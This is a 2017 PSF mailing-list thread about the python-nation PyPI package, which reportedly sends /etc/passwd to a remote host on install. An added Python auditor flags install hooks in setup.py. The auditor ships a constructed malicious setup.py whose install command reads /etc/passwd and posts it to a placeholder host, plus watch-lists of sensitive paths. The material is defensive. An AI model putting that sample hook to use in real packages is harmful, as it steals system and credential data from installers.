Interesting detail: the mentioned package https://pypi.python.org/pypi/python-nation/1.0.1 was created and uploaded by Jacob Kaplan-Moss, so I guess this is intended to be a POC to show PyPI vulnerabilities, or some infosec experiment.

On Thu, May 4, 2017 at 8:41 PM, Bruno Rocha <rochacbruno@gmail.com> wrote:

Hi,

I just read this on reddit[0], a thread asking if PyPI packages are audited, and somebody pointed to `python-nation`[1], which is a harmful and useless module: it installs itself and sends the `/etc/passwd` content to an external endpoint.

The app receiving the data is hosted at http://python-nation.herokuapp.com, and as the PSF mission [2] says:

The mission of the Python Software Foundation is to promote, protect, and advance the Python programming language

I wonder if there is some workgroup at the PSF to handle this? Not only the specific case of `python-nation`, which should be deleted and the user banned maybe, but also the audit of other packages?

[0] https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/

Cheers,
--
_______________________________________________
PSF-Community mailing list
PSF-Community@python.org
https://mail.python.org/mailman/listinfo/psf-community
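The thread describes a package whose install step reads `/etc/passwd` and ships it to a remote host. The usual way a package runs code at install time is a custom `setuptools` command class wired in through `cmdclass`, so a reviewer auditing a source distribution can statically look for exactly that pattern. The following is an added example, not part of the mailing-list thread and not the `python-nation` package's code: it parses a `setup.py` with the `ast` module and reports install hooks, network calls inside them, and references to sensitive paths. The two `setup.py` texts are constructed samples, and the call names and paths it flags are assumptions about what is worth a second look, not a complete list.

```python
"""Static audit of a setup.py for install-time hooks that read sensitive
files or talk to the network.  Added illustration; the setup.py samples
below are constructed, not taken from any real package."""
import ast

# Assumed watch-lists: not exhaustive, just what a reviewer would flag first.
NETWORK_CALLS = {"urlopen", "urlretrieve", "post", "get", "request",
                 "socket", "create_connection"}
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", ".ssh", ".aws", ".netrc")
HOOK_BASES = {"install", "develop", "egg_info", "build_py", "sdist"}


def _name_of(node):
    """Dotted name of a Name/Attribute node ('urllib.request.urlopen'), else ''."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _name_of(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def audit_setup_py(source):
    """Return a list of human-readable findings for the given setup.py text."""
    tree = ast.parse(source)
    findings = []

    # 1. Custom command classes: subclasses of setuptools install/develop/... commands.
    hook_classes = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                if _name_of(base).split(".")[-1] in HOOK_BASES:
                    hook_classes.add(node.name)
                    findings.append(
                        f"custom command class {node.name!r} subclasses {_name_of(base)}")

    # 2. Inside those classes: network calls and string literals naming sensitive paths.
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef) and node.name in hook_classes:
            for sub in ast.walk(node):
                if isinstance(sub, ast.Call):
                    callee = _name_of(sub.func).split(".")[-1]
                    if callee in NETWORK_CALLS:
                        findings.append(
                            f"{node.name}: network call {_name_of(sub.func)} at line {sub.lineno}")
                if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
                    for path in SENSITIVE_PATHS:
                        if path in sub.value:
                            findings.append(
                                f"{node.name}: references sensitive path {sub.value!r} "
                                f"at line {sub.lineno}")

    # 3. setup(...) actually wiring the hooks in via cmdclass.
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _name_of(node.func).split(".")[-1] == "setup":
            for kw in node.keywords:
                if kw.arg == "cmdclass":
                    findings.append(f"setup() overrides cmdclass at line {node.lineno}")
    return findings


# Constructed sample: the shape of an exfiltrating install hook (hostname is a placeholder).
MALICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
from urllib.request import Request, urlopen

class PostInstall(install):
    def run(self):
        install.run(self)
        data = open("/etc/passwd", "rb").read()
        urlopen(Request("http://example.invalid/collect", data=data))

setup(name="constructed-example", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed sample: an ordinary setup.py with no install-time code.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="harmless", version="0.1", py_modules=["harmless"])
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(f"== {label} ==")
        for finding in audit_setup_py(src) or ["no findings"]:
            print("  ", finding)
```

This is a triage aid, not a verdict: a legitimate package can ship a `cmdclass` override (for example to build assets), and malicious code can hide behind `exec`, obfuscation or a compiled extension that no `ast` walk will see. What it does reliably is surface the one thing worth a manual look before running `pip install` on an unknown sdist: whether the package has arranged to execute its own code at install time.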